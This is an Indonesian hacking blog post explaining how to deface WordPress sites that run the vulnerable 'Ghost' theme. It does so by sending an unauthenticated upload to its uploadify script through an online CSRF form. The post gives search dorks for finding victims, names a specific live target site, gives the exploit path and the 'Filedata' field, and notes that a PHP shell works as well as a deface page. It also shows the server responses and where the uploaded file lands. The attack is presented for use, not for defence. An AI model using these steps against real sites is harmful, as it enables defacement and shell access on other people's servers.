Cara Deface PoC Wp-Ghost Themes With Csrf

Cara deface poc wp-ghost themes with csrf

Cara Deface PoC Wp-Ghost Themes With Csrf

Assalamualaikum, halo pengunjung selamat datang di blog Shadow Secure System, pada halaman kali ini saya akan membahas Cara Deface PoC Wp-Ghost Themes With Csrf.

Bahan-bahan:

Dork:

inurl:wp-content/themes/Ghost/
inurl:wp-content/themes/Ghost/includes/
inurl:wp-content/themes/Ghost/includes/uploadify/

Baca juga :
IMO

inurl:wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

( Kembangin lagi biar dapet yang fress )

Live target:

https://www.simseklerdugunsarayi.com/

Exploit:

/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Mencari target

Pertama kalian mencari target terlebih dahulu, karena saya sudah mempunyai live target jadi langsung saja kita menambahkan exploit.

Menambahkan exploit

Menambahkan exploit

Baca juga :
WeChat

Lalu lanjut menambahkan Exploit pada akhiran target contoh seperti ini:

https://www.simseklerdugunsarayi.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Status response

Status response

Jika sudah memasukan exploit maka kalian akan mendapatkan status response seperti ini:

{"status":"NOK", "ERR":"This file is incorect"}

Csrf online

Csrf online

Setelah kalian mendapatkan status response seperti itu, lanjut kalian pergi ke csrf online cari aja digoogle banyak pada bagian target kalian masukan url target berserta exploitnya lalu dibagian post file kalian ketikan Filedata Lalu kalian lock target setelah terlock targetnya kalian upload file deface atau shell ( jika support php ) disini saya mengupload script deface, setelah memilih script deface kalian klik tombol upload.

Response upload

Response upload

Baca juga :
Google Drive

Jika kalian sudah mengklik tombol upload maka kalian akan mendapatkan response upload seperti ini:

{"status":"OK","imageID":"stronghtml","imageName":"strong.html","html":"\n\t\n\t\t html File<\/div><\/td>\n\t\tstrong.html \n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}

Akses file

Akses file

Jika file kalian berhasil terupload sekarang saatnya kalian akses file yang tadi berhasil terupload, kalian akses filenya seperti ini:

https://www.simseklerdugunsarayi.com/wp-content/uploads/settingsimages/nama file.html

Setelah diakses

Setelah diakses

Oke script deface kita sudah terupload mudah bukan? Jika masih belum paham silahkan simak video dibawah.

Baca juga :
Zoom

Sekian Cara Deface PoC Wp-Ghost Themes With Csrf pada halaman ini, jika ada kesalahan ataupun kekurangan pada halaman ini saya pribadi mohon maaf, Wassalamualaikum

Thanks for clicking.

Font Color

Font Color

Font Size

Font Space

Thanks for clicking.

Font Style 1 Font Style 2

Font Style 3 Font Style 4

Font Style 5 Font Style 6

Font Style 7 Font Style 8

Font Style 1

Font Style 2

Font Style 3

Font Style 4

Font Style 5

Font Style 6

Font Style 7

Font Style 8

Font Style

Font Style

Akronim Bad Script Black Ops One Boogaloo Bubblegum Sans Fira Mono Fredericka the Great Karantina Kumar One Outline League Script Libre Barcode 128 Text Londrina Outline Londrina Solid Luckiest Guy Material Icons Metal Mania Monoton Odibee Sans Rancho Road Rage Special Elite Sriracha Yellowtail Abril Fatface Alfa Slab One Bevan Coiny Poiret One Squada One

Close

Thanks for clicking.

Safelink generator

Thanks for clicking.

QR Code generator

Tambahkan ke bookmark

Close

Wiki

Wiki

Search Random

Thanks for clicking.

Thanks for clicking.

Thanks for clicking.

͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏͏

Thanks for clicking.

Edit Wiki Search

Random Posting Artikel

Terminal Session Wa

Close

Help!

Baca juga :

• Situs Milik Badan Siber dan Sandi Negara (BSSN) Diretas Hacker Asal Brazil
• Download Aplikasi DroidSQLi Mods v1.0
• Cyber Security: Pengertian, Konsep Dan Cara Meningkatkan di Perusahaan

Semangat berkarya mekipun hasil copy paste!

Blogger : Cerdasin62+

Mau donasi keh?

Dana Paypal

Dana - 0887435373103

Jika dana kalian terlalu banyak bisa beri admin sedikit banyak dana sesuka hati. klik icon panah di atas